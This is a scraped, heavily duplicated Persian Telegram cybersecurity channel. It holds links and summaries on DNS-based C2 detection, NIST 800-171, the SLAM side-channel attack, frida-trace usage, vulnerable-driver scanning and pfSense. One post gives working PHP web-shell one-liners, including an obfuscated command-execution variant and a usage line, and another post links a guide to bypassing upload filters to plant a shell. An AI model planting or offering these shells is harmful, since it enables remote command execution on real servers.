مرور
کشف C2 از روی کدهای DNS
https://www.socinvestigation.com/how-to-detect-malware-c2-with-dns-status-codes/
@Engineer_Computer
کشف C2 از روی کدهای DNS
https://www.socinvestigation.com/how-to-detect-malware-c2-with-dns-status-codes/
@Engineer_Computer
Security Investigation - Be the first to investigate
How to Detect Malware C2 with DNS Status Codes - Security Investigation
DNS (Domain Name System) status codes, also known as DNS response codes or DNS error codes, are numerical codes that indicate the outcome of a DNS query. When a device, such as a web browser, tries to access a domain name (like www.example.com), it sends…
👍1
تناقضاتی در درفت استاندارد جدید NIST
NIST 800-171 R3 Ghost Controls
https://www.linkedin.com/pulse/nist-800-171-r3-ghost-controls-complianceforge-hhbwc?utm_source=share&utm_medium=member_android&utm_campaign=share_via
@Engineer_Computer
NIST 800-171 R3 Ghost Controls
https://www.linkedin.com/pulse/nist-800-171-r3-ghost-controls-complianceforge-hhbwc?utm_source=share&utm_medium=member_android&utm_campaign=share_via
@Engineer_Computer
Linkedin
NIST 800-171 R3 Ghost Controls
What are “ghost controls” in NIST 800-171 R3? A ghost control is a legacy control that does not exist in NIST 800-171 R3 that is still reasonably required to demonstrate compliance. There are several aspects of NIST 800-171 R3 Final Public Draft (FPD) that…
The Art of Linux Persistence .pdf
6.9 MB
هکر ها چطور در لینوکس دسترسی خود را ماندگار میکنند
@Engineer_Computer
@Engineer_Computer
🗒 mini PHP Payload
*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Usage :
Obfuscation :
@Engineer_Computer
*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Usage :
Target.com/path/to/shell.php?0=command*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>@Engineer_Computer
🗒 I Hacked Another File Upload Website
بایپس آپلودر و آپلود شل
@Engineer_Computer
https://www.youtube.com/watch?v=BJhTZlg5Ig8
بایپس آپلودر و آپلود شل
@Engineer_Computer
YouTube
I Hacked Another File Upload Website
https://jh.live/snyk || Try Snyk for free and find vulnerabilities in your code and applications! ➡ https://jh.live/snyk
More Fetch the Flag writeups: https://jh.live/ftf-writeups
Free Cybersecurity Education and Ethical Hacking
🔥YOUTUBE ALGORITHM ➡ Like…
More Fetch the Flag writeups: https://jh.live/ftf-writeups
Free Cybersecurity Education and Ethical Hacking
🔥YOUTUBE ALGORITHM ➡ Like…
رمز نگاری منحنی و بیضوی | Elliptic Curve Cryptography
مترجم: میلاد سقایت
دانلود از سایت academia: کلیک کنید
@Engineer_Computer
مترجم: میلاد سقایت
دانلود از سایت academia: کلیک کنید
@Engineer_Computer
تست نفوذ فیزیکی
نقش خدمتکاران سازمان در حوزه امنیت فیزیکی و امنیت اطلاعات
https://covertaccessteam.substack.com/p/the-overlooked-key-exploiting-cleaning
@Engineer_Computer
نقش خدمتکاران سازمان در حوزه امنیت فیزیکی و امنیت اطلاعات
https://covertaccessteam.substack.com/p/the-overlooked-key-exploiting-cleaning
@Engineer_Computer
Substack
The Overlooked Key: Exploiting Cleaning Crew Vulnerabilities in Security Breaches
Covert Access Team is a reader-supported publication.
مقاله مهم
تطابق سنسور ها و جدول ATT&CK
https://medium.com/mitre-engenuity/understanding-the-connection-cybersecurity-events-and-mitre-att-ck-58e977c9fd5a
@Engineer_Computer
تطابق سنسور ها و جدول ATT&CK
https://medium.com/mitre-engenuity/understanding-the-connection-cybersecurity-events-and-mitre-att-ck-58e977c9fd5a
@Engineer_Computer
Medium
Understanding the Connection: Cybersecurity Events and MITRE ATT&CK®
Written by Tiffany Bergeron (@tbergeron) and Lex Crumpton(Lex Crumpton)
یه رایتاپ نچندان فنی ولی جذاب برای مایندست یه هانتر:
https://nmochea.medium.com/a-million-journey-f02df23a2ae7
@Engineer_Computer
https://nmochea.medium.com/a-million-journey-f02df23a2ae7
@Engineer_Computer
Medium
A Million Journey
How I Become a Millionaire
⭕️ محققان دانشگاه Vrije در آمستردام هلند یک حمله Side-Channel جدید به نام SLAM را کشف کردهاند که میتواند برای نشت اطلاعات حساس از حافظه کرنل در CPU های فعلی و آینده ی Intel , AMD و ARM مورد سوء استفاده قرار گیرد.
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا دادههای کرنل ASCII دلخواه را به بیرون بکشیم و میتوان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است
@Engineer_Computer
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا دادههای کرنل ASCII دلخواه را به بیرون بکشیم و میتوان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است
@Engineer_Computer
⭕️چگونگی استفاده از frida-trace برای تحلیل داینامیک اپ های اندرویدی در Termux:
برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد:
توسط پروسس نیم برنامه:
برای تریس کردن لایبرری و فانکشن های داخل آن:
تریس به صورت auto spawn:
@Engineer_Computer
توجه: نصب بودن ابزار frida-tools و انتقال فایل فریدا سرور به دایرکتوری زیر الزامی میباشد
/data/local/tmp
پس از انتقال فایل دسترسی 777 داده و ران کنید.
برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد:
توسط پروسس نیم برنامه:
frida-trace -R -J 'path/to/class!methodName' ProcessNameتریس به صورت auto spawn:
frida-trace -R -J 'path/to/class!methodName' -f com.package.nameتریس برنامه توسط pid برنامه:
frida-trace -R -j 'path/to/class!methodName' -p pid---------------------------------------------------------
برای تریس کردن لایبرری و فانکشن های داخل آن:
تریس به صورت auto spawn:
frida-trace -R -I 'libname.so' -i 'MethodName' -f com.package.nameتوسط پروسس نیم برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' ProcessNameتریس برنامه توسط pid برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' -p pid
@Engineer_Computer
🔍 درایورها بخشی جدایی ناپذیر از عملکرد رایانه هستند و آسیب پذیری آنها یا استفاده از درایورهای مخرب می توانند خطرات امنیتی قابل توجهی ایجاد کنند.
⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید.
🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید.
این ابزارها لیست درایورهای مخرب را از
loldrivers.io
گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند.
🔬 اسکنرها
🔬 https://github.com/FourCoreLabs/loldriverscan
🔬 https://github.com/rtfmkiesel/loldrivers-client
🛟 پروژه هش لیست درایور های مخرب شناسایی شده
🛟 https://www.loldrivers.io
🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC
🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml
@Engineer_Computer
⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید.
🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید.
این ابزارها لیست درایورهای مخرب را از
loldrivers.io
گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند.
🔬 اسکنرها
🔬 https://github.com/FourCoreLabs/loldriverscan
🔬 https://github.com/rtfmkiesel/loldrivers-client
🛟 پروژه هش لیست درایور های مخرب شناسایی شده
🛟 https://www.loldrivers.io
🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC
🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml
@Engineer_Computer
GitHub
GitHub - FourCoreLabs/LolDriverScan: Scan vulnerable drivers on Windows with loldrivers.io
Scan vulnerable drivers on Windows with loldrivers.io - FourCoreLabs/LolDriverScan
❤1
Roadmap to Become Web3 Developer :
📂 Learn HTML
∟📂 Learn CSS
∟📂 Learn JavaScript
∟📂 Learn React
∟📂 Learn Solidity
∟📂 Learn Ether.js
∟📂 Learn L2
∟📂 Build Projects
∟ ✅ Start Applying for Job’s
@Engineer_Computer
📂 Learn HTML
∟📂 Learn CSS
∟📂 Learn JavaScript
∟📂 Learn React
∟📂 Learn Solidity
∟📂 Learn Ether.js
∟📂 Learn L2
∟📂 Build Projects
∟ ✅ Start Applying for Job’s
@Engineer_Computer
❤1
This media is not supported in your browser
VIEW IN TELEGRAM
👻 دیپ فیک مستقیماً از وب کم شما.
#هوش_مصنوعی بدون نیاز به دانلود
مدل به طور مستقیم در مرورگر اجرا می شود.
🌐 https://www.fal.ai/camera
@Engineer_Computer
#هوش_مصنوعی بدون نیاز به دانلود
مدل به طور مستقیم در مرورگر اجرا می شود.
🌐 https://www.fal.ai/camera
@Engineer_Computer
👍2🤯1
فایروال pfsense رو به روز نگه دارید
https://thehackernews.com/2023/12/new-security-vulnerabilities-uncovered.html
@Engineer_Computer
https://thehackernews.com/2023/12/new-security-vulnerabilities-uncovered.html
@Engineer_Computer
نصب و تنظیم فایروال pfsense
https://medium.com/@justinmangaoang/installing-and-configuring-pfsense-8d89f01d9c5d
@Engineer_Computer
https://medium.com/@justinmangaoang/installing-and-configuring-pfsense-8d89f01d9c5d
@Engineer_Computer
Medium
Installing and Configuring pfSense
Firewalls act as the first line of defense in the network. It serves as the boundary between the big bad internet and one’s internal…